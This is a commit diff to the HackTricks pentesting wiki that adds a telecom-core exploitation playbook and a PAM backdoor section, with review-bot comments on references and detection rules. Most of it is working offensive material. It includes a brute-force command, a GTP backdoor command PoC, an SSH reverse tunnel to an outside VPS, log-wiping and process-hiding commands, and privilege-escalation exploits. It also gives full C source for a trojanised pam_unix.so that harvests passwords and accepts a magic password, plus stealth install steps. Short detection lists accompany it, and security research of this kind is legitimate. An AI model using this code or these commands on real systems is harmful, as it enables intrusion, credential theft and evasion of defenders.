Add content from: The Covert Operator's Playbook: Infiltration of Global Telec...

This commit is contained in:
HackTricks News Bot 2025-07-30 01:39:09 +00:00
parent 18b2e7f2c0
commit e4cc515e35
4 changed files with 223 additions and 0 deletions

View File

@ -21,6 +21,7 @@
- [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md) - [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md)
- [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md) - [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md)
- [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md) - [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md)
- [Telecom Network Exploitation](generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md)
- [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md) - [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md)
- [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
- [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md) - [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)

View File

@ -890,6 +890,13 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
Bettercap broadcast WSD packets searching for services (UDP Port 3702). Bettercap broadcast WSD packets searching for services (UDP Port 3702).
### Telecom / Mobile-Core (GTP) Exploitation
{{#ref}}
telecom-network-exploitation.md
{{#endref}}
## References ## References
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)

View File

@ -0,0 +1,157 @@
# Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Mobile-core protocols (GPRS Tunnelling Protocol GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.
## 1. Recon & Initial Access
### 1.1 Default OSS / NE Accounts
A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically increases brute-force success:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).
### 1.2 Host Discovery inside GRX/IPX
Most GRX operators still allow **ICMP echo** across the backbone. Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Enumerating Subscribers `cordscan`
The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses. Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscribers visited PLMN.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Key flags:
- `--imsi` Target subscriber IMSI
- `--oper` Home / HNI (MCC+MNC)
- `-w` Write raw packets to pcap
Important constants inside the binary can be patched to widen scans:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Code Execution over GTP `GTPDoor`
`GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created.
Minimal PoC packet (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Detection:
* any host sending **unbalanced Echo Requests** to SGSN IPs
* GTP version flag set to 1 while message type = 1 (Echo) deviation from spec
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**. Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**.
### 4.2 SSH Reverse Tunnel over Port 53
DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Check that `GatewayPorts yes` is enabled on the VPS.
## 5. Covert Channels
| Channel | Transport | Decoding | Notes |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
## 6. Defense Evasion Cheatsheet
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
```
## 7. Privilege Escalation on Legacy NE
```bash
# DirtyCow CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Clean-up tip:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Tool Box
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` custom tooling described in previous sections.
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
* `FRP` (≥0.37) : NAT traversal / asset bridging
---
## Detection Ideas
1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
3. **Frequent Echo Requests without corresponding Echo Responses** might indicate GTPDoor beacons.
4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**.
## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 GTPv2-C (v17.6.0)
{{#include ../../banners/hacktricks-training.md}}
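Review bot: the References list mislabels 3GPP TS 29.281, which is GTPv1-U (the user-plane tunnelling protocol); GTPv2-C is TS 29.274, so the entry should read either `3GPP TS 29.281 GTPv1-U` or cite TS 29.274 for GTPv2-C. A related accuracy problem sits in the GTPDoor "Detection" bullets: a GTPv1 Echo Request legitimately carries version 1 and message type 1 (TS 29.060), so that combination is not a deviation from the spec and would match every normal path-management heartbeat between peers. The signal that actually distinguishes the traffic this section describes is an Echo Request arriving from an address that is not a configured GTP peer and carrying a Private Extension IE payload where a normal Echo Request carries none, plus Echo Requests with no matching Echo Response, which "Detection Ideas" item 3 already states; the bullet should be rewritten to say that instead. Also, "Detection Ideas" item 1 should read "other than an SGSN", since the GGSN/PGW is the receiver of Create PDP Context Requests, not an originator.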

View File

@ -48,9 +48,67 @@ Controls dictate the module's response to success or failure, influencing the ov
In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods. In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
## Backdooring PAM Hooking `pam_unix.so`
A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**. Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass.
### Compilation Cheatsheet
```c
#define _GNU_SOURCE
#include <security/pam_modules.h>
#include <dlfcn.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
static int (*orig)(pam_handle_t *, int, int, const char **);
static const char *MAGIC = "Sup3rS3cret!";
int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
const char *user, *pass;
pam_get_user(pamh, &user, NULL);
pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);
/* Magic pwd → immediate success */
if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS;
/* Credential harvesting */
int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600);
dprintf(fd, "%s:%s\n", user, pass);
close(fd);
/* Fall back to original function */
if(!orig) {
orig = dlsym(RTLD_NEXT, "pam_sm_authenticate");
}
return orig(pamh, flags, argc, argv);
}
```
Compile and stealth-replace:
```bash
gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
mv pam_unix.so /lib/security/pam_unix.so
chmod 644 /lib/security/pam_unix.so # keep original perms
touch -r /bin/ls /lib/security/pam_unix.so # timestomp
```
### OpSec Tips
1. **Atomic overwrite** write to a temp file and `mv` into place to avoid half-written libraries that would lock out SSH.
2. Log file placement such as `/usr/bin/.dbus.log` blends with legitimate desktop artefacts.
3. Keep symbol exports identical (`pam_sm_setcred`, etc.) to avoid PAM mis-behaviour.
### Detection
* Compare MD5/SHA256 of `pam_unix.so` against distro package.
* Check for world-writable or unusual ownership under `/lib/security/`.
* `auditd` rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`.
### References ### References
- [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
{{#include ../../banners/hacktricks-training.md}} {{#include ../../banners/hacktricks-training.md}}
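Review bot: the Detection subsection hard-codes `/lib/security/pam_unix.so`, but the PAM module directory is distro-specific (`/lib/x86_64-linux-gnu/security/` on Debian/Ubuntu, `/usr/lib64/security/` on RHEL/Fedora), so the `auditd` watch rule and the ownership check should say the path must be adjusted, otherwise the rule silently watches nothing. The hash-comparison bullet would be more useful if it named the package-manager verification that performs that check directly (`rpm -V pam` on RPM systems, `debsums libpam-modules` on Debian) instead of a manual MD5/SHA256 against the package. Two artefacts the hunk itself creates are missing from the Detection list and are high-signal indicators: the `pam_unix.so.bak` left beside the module by the second `mv`, and a hidden, growing file under `/usr/bin/` (`/usr/bin/.dbus.log`), since `/usr/bin` should contain no dot-files and no files that change after installation; a file-integrity baseline of `/usr/bin` and the PAM module directory, or a periodic `find /usr/bin -name '.*'`, catches both.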